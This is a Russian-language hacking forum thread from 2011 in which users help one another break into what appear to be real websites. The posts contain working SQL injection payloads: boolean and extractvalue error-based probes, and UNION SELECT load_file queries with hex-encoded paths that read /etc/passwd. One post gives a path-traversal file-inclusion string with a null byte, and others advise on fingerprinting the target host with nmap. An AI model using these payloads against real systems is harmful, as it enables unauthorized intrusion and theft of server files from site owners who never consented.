Старый 02.10.2011, 15:23   #1371
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от shy Посмотреть сообщение
http://www.***.ru/100/101
Можно раскрутить как sqli ?
http://www.***.ru/100/101'and+substring(version(),1,1)='5 - TRUE
http://www.***.ru/100/101'and+substring(version(),1,1)='4 - FALSE

Последний раз редактировалось Twost; 17.05.2013 в 13:14..
Tigger вне форума   Ответить с цитированием
Старый 02.10.2011, 15:53   #1372
bloodAngel
 
Регистрация: 23.12.2010
Сообщений: 36
Репутация: -1
По умолчанию

Цитата:
Сообщение от Tigger Посмотреть сообщение
1. Это из-за включенного magic_quotes.
2. Зачем ты вставляешь обрезание расширения до вводимоного значения? Обрезать надо расширение, т.е. то что мешает правильно проинклюдить файл. (../../../../../../etc/passwd%00)
3. Попробуй вот это - https://forum.antichat.ru/thread98525.html
не помогло !да и ладно
bloodAngel вне форума   Ответить с цитированием
Старый 02.10.2011, 18:48   #1373
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Цитата:
Сообщение от shy Посмотреть сообщение
http://www.***.ru/100/101
Можно раскрутить как sqli ?
Первый вариант через браузер работать не будет.
Код:
'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
Второй вариант будет работать и через браузер.

Код:
http://www.gard.ru/100/101'and(extractvalue(1,concat(0x3a,(version()))))and'/
Tigger

У тебя там 2 проблемы. Первая проблема в переменной "x" это нельзя выйти за пределы директории потому что нужно переходить по несуществующим папкам, а в твоей версии системы по ним ходить нельзя.

Вторая почти такая же в переменной "y", но в этом случае вначале переменной не добавляется main_, но первым символов объязательно должна быть цифра.

Последний раз редактировалось Twost; 17.05.2013 в 13:15..
v1d0q вне форума   Ответить с цитированием
Старый 02.10.2011, 20:12   #1374
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Инъекция вида:
Цитата:
id=-666+UNION+ALL+SELECT+1,load_file(0x2f6574632f70617 3737764),3,4,5
выводит /etc/passwd
Другой код выводит /etc/issue
Цитата:
id=-666+UNION+ALL+SELECT+1,load_file(0x2f6574632f69737 37565),3,4,5
Цитата:
Red Hat Enterprise Linux Server release 5.7
Т.к. сразу после равно стоит минус - на странице вываливаются ошибки mysql:
Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /www/domen/www/include/common.php on line 666
Но если захексить этот путь /www/domen/www/include/common.php(или любой другой) и вставить в load_file - то ничего не выводится(читается)...
Хтаксес на главной странице и то открывается в браузере(доступен всем на чтение) - но через load_file прочесть не могу =\
Права: root [mysql]

В чем проблема?
Спасибо.
dumb вне форума   Ответить с цитированием
Старый 02.10.2011, 21:27   #1375
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
Хтаксес на главной странице и то открывается в браузере(доступен всем на чтение) - но через load_file прочесть не могу =\
Права: root [mysql]

В чем проблема?
Спасибо.
1) У мускула нет прав на чтение каталогов сайта.
2) Мускул и сайт расположены на разных хостах.
nikp вне форума   Ответить с цитированием
Старый 03.10.2011, 01:28   #1376
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
1) У мускула нет прав на чтение каталогов сайта.
2) Мускул и сайт расположены на разных хостах.
Если права правда "root [mysql]", то их хватает на все
Скорее всего реально СУБД и веб на разных хостах (выводится load_file(/etc/passwd), стало быть FILE_PRIV есть. Тогда сравнивай версии ОС из файла /etc/redhat-release и nmap -O на домене, если будут разные, явное подтверждение)
__________________
The Sucks Origin Policy

Последний раз редактировалось d0znpp; 03.10.2011 в 01:31..
d0znpp вне форума   Ответить с цитированием
Старый 03.10.2011, 05:39   #1377
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от d0znpp Посмотреть сообщение
Если права правда "root [mysql]", то их хватает на все
Нет, mysql.user.file_priv говорит о том , что для данной учетки клиента MySQL разрешены файловые операции с правами пользователя, от которого запущен MySQL (а это обычно не root системы), но сами права на файлы определяются системой, например "chmod -R 640 /path/*", где Мускул попадает под маску "0", соответственно чтения не будет.

Up
select @@hostname
говорит, что хосты разные

Последний раз редактировалось nikp; 03.10.2011 в 13:15..
nikp вне форума   Ответить с цитированием
Старый 03.10.2011, 10:51   #1378
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
а это обычно не root системы
Да все понятно Но только фраза
Цитата:
root [mysql]
Говорит об обратном.

Хотя мб я ее на правильно понял, и здесь описаны права технического пользователя mysql, от которого выполняется инъекция. То есть select user() дает root.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 03.10.2011, 10:52   #1379
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Нет, не на разных хостах.
При выводе юзера:
Цитата:
id=-666+UNION+ALL+SELECT+1,user(),3,4,5
отображается и хост:
Цитата:
root@xx.yyy.zzzz.com
Так вот судя по warning'ам хостов by reverse ip - пути от корня те же.

И пути в на этом сервере какие-то не стандартные...за 2 часа только логи железа подобрал =\

nikp,d0znpp - скинул линк в ПМ.
dumb вне форума   Ответить с цитированием
Старый 03.10.2011, 11:11   #1380
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

лол, учитывая, что в user() указывается хост клиента, а не сервера)
Andrey1800 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot